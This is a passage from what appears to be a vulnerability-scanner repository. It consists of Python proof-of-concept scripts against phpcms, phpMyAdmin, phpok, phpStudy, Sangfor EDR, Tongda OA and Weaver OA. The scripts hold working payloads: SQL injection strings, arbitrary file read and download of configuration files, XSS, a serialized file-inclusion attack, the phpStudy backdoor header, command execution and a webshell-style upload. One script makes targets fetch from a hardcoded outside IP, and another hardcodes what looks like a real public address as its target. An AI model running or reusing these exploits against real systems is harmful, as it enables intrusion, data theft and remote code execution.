"cyan") 34 | 35 | if __name__ == "__main__": 36 | warnings.filterwarnings("ignore") 37 | testVuln = phpcms_product_code_exec_BaseVerify(sys.argv[1]) 38 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/phpcms_v961_fileread.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: phpcms 9.6.1任意文件读取漏洞 5 | referer: http://bobao.360.cn/learning/detail/3805.html 6 | author: Lucifer 7 | description: phpcms最新版本任意文件读取,漏洞原理见来源页面。 8 | ''' 9 | import re 10 | import sys 11 | import requests 12 | import warnings 13 | from termcolor import cprint 14 | 15 | class phpcms_v961_fileread_BaseVerify: 16 | def __init__(self, url): 17 | self.url = url 18 | 19 | def run(self): 20 | headers = { 21 | "Content-Type":"application/x-www-form-urlencoded", 22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 23 | } 24 | url_preffix = self.url + "/index.php?m=wap&c=index&a=init&siteid=1" 25 | siteid = "" 26 | att_json = "" 27 | try: 28 | req1 = requests.get(url_preffix, headers=headers, timeout=10, verify=False) 29 | for cookie in req1.cookies: 30 | siteid = cookie.value 31 | payload = "/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&filename=test.jpg&src=%26i%3D3%26d%3D1%26t%3D9999999999%26catid%3D1%26ip%3D8.8.8.8%26m%3D3%26modelid%3D3%26s%3Dcaches%2fconfigs%2fsystem.p%26f%3Dh%25253Cp%26xxxx%3D" 32 | vulnurl = self.url + payload 33 | post_data = { 34 | "userid_flash":siteid 35 | } 36 | req2 = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) 37 | for cookie in req2.cookies: 38 | att_json = cookie.value 39 | req3 = requests.get(self.url+"/index.php?m=content&c=down&a=init&a_k="+att_json, headers=headers, timeout=10, verify=False) 40 | pattern = '.*?' 41 | link = re.search(pattern, req3.text).group(1) 42 | req4 = requests.get(self.url+"/index.php"+link, headers=headers, verify=False) 43 | if r"可能不存在漏洞", "cyan") 51 | 52 | if __name__ == "__main__": 53 | warnings.filterwarnings("ignore") 54 | testVuln = phpcms_v961_fileread_BaseVerify(sys.argv[1]) 55 | testVuln.run() 56 | -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/phpcms_v96_sqli.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: phpcms v9.6.0 SQL注入 5 | referer: https://zhuanlan.zhihu.com/p/26263513 6 | author: Lucifer 7 | description: 过滤函数不严谨造成的过滤绕过。 8 | ''' 9 | import sys 10 | import requests 11 | import warnings 12 | from termcolor import cprint 13 | 14 | class phpcms_v96_sqli_BaseVerify: 15 | def __init__(self, url): 16 | self.url = url 17 | 18 | def run(self): 19 | headers = { 20 | "Content-Type":"application/x-www-form-urlencoded", 21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 22 | } 23 | url_prefix = self.url + "/index.php?m=wap&c=index&a=init&siteid=1" 24 | tmp_cookie = {} 25 | try: 26 | req = requests.get(url_prefix, headers=headers, timeout=10, verify=False) 27 | for cookie in req.cookies: 28 | tmp_cookie = cookie.value 29 | except: 30 | pass 31 | post_data = { 32 | "userid_flash":tmp_cookie 33 | } 34 | url_suffix = self.url + "/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28user%28%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26" 35 | try: 36 | req2 = requests.post(url_suffix, data=post_data, headers=headers, timeout=10, verify=False) 37 | for cookie in req2.cookies: 38 | tmp_cookie = cookie.value 39 | except: 40 | pass 41 | 42 | vulnurl = self.url + "/index.php?m=content&c=down&a_k="+str(tmp_cookie) 43 | try: 44 | req3 = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 45 | if r"XPATH syntax error" in req3.text: 46 | cprint("[+]存在phpcms v9.6.0 SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red") 47 | return True 48 | else: 49 | cprint("[-]不存在phpcms_v96_sqli漏洞", "white", "on_grey") 50 | 51 | except: 52 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 53 | 54 | if __name__ == "__main__": 55 | warnings.filterwarnings("ignore") 56 | testVuln = phpcms_v96_sqli_BaseVerify(sys.argv[1]) 57 | testVuln.run() 58 | -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/phpcms_v9_flash_xss.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: phpcms v9 flash xss漏洞 5 | referer: http://www.wooyun.org/bugs/wooyun-2014-079938 6 | author: Lucifer 7 | description: 文件player.swf中,存在xss漏洞。 8 | ''' 9 | import sys 10 | import urllib.request 11 | import hashlib 12 | import requests 13 | import warnings 14 | from termcolor import cprint 15 | 16 | class phpcms_v9_flash_xss_BaseVerify: 17 | def __init__(self, url): 18 | self.url = url 19 | 20 | def run(self): 21 | headers = { 22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 23 | } 24 | flash_md5 = "cf00b069e36e756705c49b3a3bf20c40" 25 | payload = "/statics/js/ckeditor/plugins/flashplayer/player/player.swf?skin=skin.swf&stream=\%22))}catch(e){alert(1)}//" 26 | vulnurl = self.url + payload 27 | try: 28 | req = urllib.request.urlopen(vulnurl) 29 | data = req.read() 30 | md5_value = hashlib.md5(data).hexdigest() 31 | if md5_value in flash_md5: 32 | cprint("[+]存在phpcms v9 flash xss漏洞...(高危)\tpayload: "+vulnurl, "red") 33 | return True 34 | else: 35 | cprint("[-]不存在phpcms_v9_flash_xss漏洞", "white", "on_grey") 36 | 37 | except: 38 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 39 | 40 | if __name__ == "__main__": 41 | warnings.filterwarnings("ignore") 42 | testVuln = phpcms_v9_flash_xss_BaseVerify(sys.argv[1]) 43 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/phpmyadmin/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpmyadmin/__init__.py -------------------------------------------------------------------------------- /POC_Scan/cms/phpmyadmin/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpmyadmin/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpmyadmin/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpmyadmin/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpmyadmin/__pycache__/phpmyadmin_setup_lfi.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpmyadmin/__pycache__/phpmyadmin_setup_lfi.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpmyadmin/__pycache__/phpmyadmin_setup_lfi.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpmyadmin/__pycache__/phpmyadmin_setup_lfi.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpmyadmin/phpmyadmin_setup_lfi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: PhpMyAdmin2.8.0.3无需登录任意文件包含导致代码执行 5 | referer: http://www.mottoin.com/87915.html 6 | author: Lucifer 7 | description: 文件setup.php中,参数configuration经过序列化对象可导致文件包含漏洞。 8 | ''' 9 | import sys 10 | import json 11 | import requests 12 | import warnings 13 | from termcolor import cprint 14 | 15 | class phpmyadmin_setup_lfi_BaseVerify: 16 | def __init__(self, url): 17 | self.url = url 18 | 19 | def run(self): 20 | headers = { 21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 22 | } 23 | payload = "/scripts/setup.php" 24 | post_data ={ 25 | 'configuration':'O:10:"PMA_Config":1:{s:6:"source";s:11:"c:/boot.ini";}', 26 | 'action':'test' 27 | } 28 | vulnurl = self.url + payload 29 | try: 30 | req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) 31 | if r"boot loader" in req.text: 32 | cprint("[+]存在PhpMyAdmin2.8.0.3无需登录任意文件包含导致代码执行漏洞(WINDOWS)...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red") 33 | return True 34 | else: 35 | cprint("[-]不存在phpmyadmin_setup_lfi漏洞", "white", "on_grey") 36 | 37 | except: 38 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 39 | 40 | if __name__ == "__main__": 41 | warnings.filterwarnings("ignore") 42 | testVuln = phpmyadmin_setup_lfi_BaseVerify(sys.argv[1]) 43 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__init__.py -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/__pycache__/phpok_api_param_sqli.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/phpok_api_param_sqli.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/__pycache__/phpok_api_param_sqli.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/phpok_api_param_sqli.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/__pycache__/phpok_remote_image_getshell.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/phpok_remote_image_getshell.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/__pycache__/phpok_remote_image_getshell.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/phpok_remote_image_getshell.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/__pycache__/phpok_res_action_control_filedownload.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/phpok_res_action_control_filedownload.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/__pycache__/phpok_res_action_control_filedownload.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/phpok_res_action_control_filedownload.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/phpok_api_param_sqli.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: phpok api.php SQL注入漏洞 5 | referer: http://www.moonsec.com/post-677.html 6 | author: Lucifer 7 | description: api_control文件存在SQL注入。 8 | ''' 9 | import sys 10 | import requests 11 | import warnings 12 | from termcolor import cprint 13 | 14 | class phpok_api_param_sqli_BaseVerify: 15 | def __init__(self, url): 16 | self.url = url 17 | 18 | def run(self): 19 | headers = { 20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 21 | } 22 | payload = "/api.php?c=api&f=phpok&id=_total¶m[pid]=42¶m[user_id]=0)UnIOn/**/sElEcT/**/mD5(1234)/**/LIMIT/**/1,1%23" 23 | vulnurl = self.url + payload 24 | try: 25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: 27 | cprint("[+]存在phpok api.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red") 28 | return True 29 | else: 30 | cprint("[-]不存在phpok_api_param_sqli漏洞", "white", "on_grey") 31 | 32 | except: 33 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 34 | 35 | if __name__ == "__main__": 36 | warnings.filterwarnings("ignore") 37 | testVuln = phpok_api_param_sqli_BaseVerify(sys.argv[1]) 38 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/phpok_remote_image_getshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: phpok remote_image getshell漏洞 5 | referer: http://0day5.com/archives/1820/ 6 | author: Lucifer 7 | description: remote_image_f函数没对远程文件后缀做检查直接保存到本地。 8 | ''' 9 | import sys 10 | import time 11 | import hashlib 12 | import datetime 13 | import requests 14 | import warnings 15 | from termcolor import cprint 16 | 17 | class phpok_remote_image_getshell_BaseVerify: 18 | def __init__(self, url): 19 | self.url = url 20 | 21 | def run(self): 22 | headers = { 23 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 24 | } 25 | time_stamp = time.mktime(datetime.datetime.now().timetuple()) 26 | m = hashlib.md5(str(time_stamp).encode(encoding='utf-8')) 27 | md5_str = m.hexdigest() 28 | payload = "/index.php?c=ueditor&f=remote_image&upfile=http://45.76.158.91:6868/" + md5_str 29 | vulnurl = self.url + payload 30 | try: 31 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 32 | eye_url = "http://45.76.158.91/web.log" 33 | time.sleep(6) 34 | reqr = requests.get(eye_url, headers=headers, timeout=10, verify=False) 35 | if md5_str in reqr.text: 36 | cprint("[+]存在phpok remote_image getshell漏洞...(高危)\tpayload: "+vulnurl, "red") 37 | return True 38 | else: 39 | cprint("[-]不存在phpok_remote_image_getshell漏洞", "white", "on_grey") 40 | 41 | except: 42 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 43 | 44 | if __name__ == "__main__": 45 | warnings.filterwarnings("ignore") 46 | testVuln = phpok_remote_image_getshell_BaseVerify(sys.argv[1]) 47 | testVuln.run() 48 | -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/phpok_res_action_control_filedownload.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: phpok res_action_control.php 任意文件下载(需要cookies文件) 5 | referer: unknown 6 | author: Lucifer 7 | description: 参数file未经过滤进入到下载方法导致任意文件下载。 8 | ''' 9 | import sys 10 | import json 11 | import requests 12 | import warnings 13 | from termcolor import cprint 14 | 15 | class phpok_res_action_control_filedownload_BaseVerify: 16 | def __init__(self, url): 17 | self.url = url 18 | 19 | def run(self): 20 | headers = { 21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 22 | } 23 | payload = "/admin.php?c=res_action&f=download&file=_config/db.ini.php" 24 | vulnurl = self.url + payload 25 | try: 26 | f = open(r'cookies.txt', 'r') 27 | cookies = {} 28 | for line in f.read().split(";"): 29 | name, value = line.strip().split("=",1) 30 | cookies[name]=value 31 | except: 32 | pass 33 | try: 34 | req = requests.get(vulnurl, headers=headers, cookies=cookies, timeout=10, verify=False) 35 | if r"可能不存在漏洞", "cyan") 43 | 44 | if __name__ == "__main__": 45 | warnings.filterwarnings("ignore") 46 | testVuln = phpok_res_action_control_filedownload_BaseVerify(sys.argv[1]) 47 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/phpstudy/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__init__.py -------------------------------------------------------------------------------- /POC_Scan/cms/phpstudy/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpstudy/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpstudy/__pycache__/phpstudy_backdoor.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__pycache__/phpstudy_backdoor.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpstudy/__pycache__/phpstudy_backdoor.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__pycache__/phpstudy_backdoor.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpstudy/__pycache__/phpstudy_phpmyadmin_defaultpwd.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__pycache__/phpstudy_phpmyadmin_defaultpwd.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpstudy/__pycache__/phpstudy_probe.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__pycache__/phpstudy_probe.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpstudy/phpstudy_backdoor.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from termcolor import cprint 3 | 4 | class phpstudy_backdoor_BaseVerify(): 5 | def __init__(self,url): 6 | self.url = url 7 | 8 | def run(self): 9 | poc = { 10 | "Accept-Charset": "cGhwaW5mbygpOw==", 11 | "Accept-Encoding": "gzip,deflate" 12 | } 13 | try: 14 | pocRequest = requests.get(self.url, headers=poc,timeout=3) 15 | if "phpinfo" in str(pocRequest.content): 16 | cprint("[+]存在phpstudy_backdoor漏洞\tpayload: "+self.url, "green") 17 | return True 18 | else: 19 | cprint("[-]不存在phpstudy_backdoor漏洞", "white", "on_grey") 20 | except : 21 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 22 | 23 | if __name__ == "__main__": 24 | test=phpstudy_backdoor_BaseVerify('http://192.168.5.8') 25 | test.run() 26 | 27 | -------------------------------------------------------------------------------- /POC_Scan/cms/sangfor/__pycache__/sanfor_edr.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/sangfor/__pycache__/sanfor_edr.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/sangfor/sanfor_edr.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib3 4 | from termcolor import cprint 5 | import sys 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | 8 | class sanfor_edr_rce_BaseVerify(): 9 | def __init__(self,target): 10 | self.target = target 11 | self.payload = '/tool/log/c.php?strip_slashes=system&host=echo hello' 12 | 13 | def run(self): 14 | headers={ 15 | 'Connection': 'close', 16 | 'Cache-Control': 'max-age=0', 17 | 'Upgrade-Insecure-Requests': '1', 18 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36', 19 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 20 | 'Sec-Fetch-Site': 'none', 21 | 'Sec-Fetch-Mode': 'navigate', 22 | 'Sec-Fetch-User': '?1', 23 | 'Sec-Fetch-Dest': 'document', 24 | 'Accept-Encoding': 'gzip, deflate', 25 | 'Accept-Language': 'zh-CN,zh;q=0.9' 26 | } 27 | 28 | url=self.target+self.payload 29 | 30 | try: 31 | response = requests.get(url,verify=False,headers=headers) 32 | response.raise_for_status() 33 | response.encoding = "utf-8" 34 | res=re.findall(r'Log Helper

(.+?)
可能不存在漏洞", "cyan")
42 | 
43 | if __name__ == '__main__':
44 | 
45 |     tarhet = 'https://202.96.186.66:9443/'
46 |     sanfor = sanfor_edr_rce_BaseVerify(tarhet)
47 |     sanfor.run()
48 | 
49 | 
50 | 


--------------------------------------------------------------------------------
/POC_Scan/cms/tongda_oa/__pycache__/tongdaRCE.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/tongda_oa/__pycache__/tongdaRCE.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/tongda_oa/tongdaRCE.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from termcolor import cprint
 3 | 
 4 | class tongda_rce_BaseVerify():
 5 |     def __init__(self,target):
 6 |         self.target=target
 7 | 
 8 |     def run(self):
 9 |         try:
10 |             payload = ""
11 |             url=self.target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
12 |             requests.get(url=url)
13 |             url=self.target+"/inc/auth.inc.php"
14 |             page=requests.get(url=url).text
15 |             if 'No input file specified.' not in page:
16 |                 int('a')
17 |             url=self.target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
18 |             files = {'FILE1': ('dadada.php', payload)}
19 |             requests.post(url=url,files=files)
20 |             url=self.target+"/_dadada.php"
21 |             page=requests.get(url=url).text
22 |             if 'No input file specified.' not in page:
23 |                 cprint("[+]存在通达OA-RCE漏洞...(信息)\t","green")
24 |                 cprint("[+]URL:",url)
25 |                 return True
26 |             else:
27 |                 cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
28 |         except:
29 |             cprint("[-] " + __file__ + "====>可能不存在漏洞", "cyan")
30 | 
31 | if __name__ == '__main__':
32 |     tongda = tongda_RCE_BaseVerify('')
33 |     tongda.run()


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/weaver_oa/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/weaver_oa/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/weaver_oa/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_db_disclosure.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_db_disclosure.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_db_disclosure.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_db_disclosure.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_download_sqli.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_download_sqli.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_download_sqli.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_download_sqli.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_filedownload.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_filedownload.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_filedownload.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_filedownload.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/weaver_oa_db_disclosure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: 泛微OA 数据库配置泄露
 5 | referer: http://www.loner.fm/bugs/bug_detail.php?wybug_id=wooyun-2014-087500
 6 | author: Lucifer
 7 | description: mysql_config.ini泄露。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class weaver_oa_db_disclosure_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         headers = {
20 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 |         }
22 |         payload = "/mysql_config.ini"
23 |         vulnurl = self.url + payload
24 | 
25 |         try:
26 |             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
27 |             if r"datapassword" in req.text:
28 |                 cprint("[+]存在泛微OA 数据库配置泄露漏洞...(高危)\tpayload: "+vulnurl, "red")
29 |                 return True
30 |             else:
31 |                 cprint("[-]不存在weaver_oa_db_disclosure漏洞", "white", "on_grey")
32 | 
33 |         except:
34 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
35 | 
36 | if __name__ == "__main__":
37 |     warnings.filterwarnings("ignore")
38 |     testVuln = weaver_oa_db_disclosure_BaseVerify(sys.argv[1])
39 |     testVuln.run()


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/weaver_oa_download_sqli.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: 泛微OA filedownaction SQL注入
 5 | referer: https://wooyun.shuimugan.com/bug/view?bug_no=76418
 6 | author: Lucifer
 7 | description: fileid参数引起的布尔盲注。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class weaver_oa_download_sqli_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         headers = {
20 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 |         }
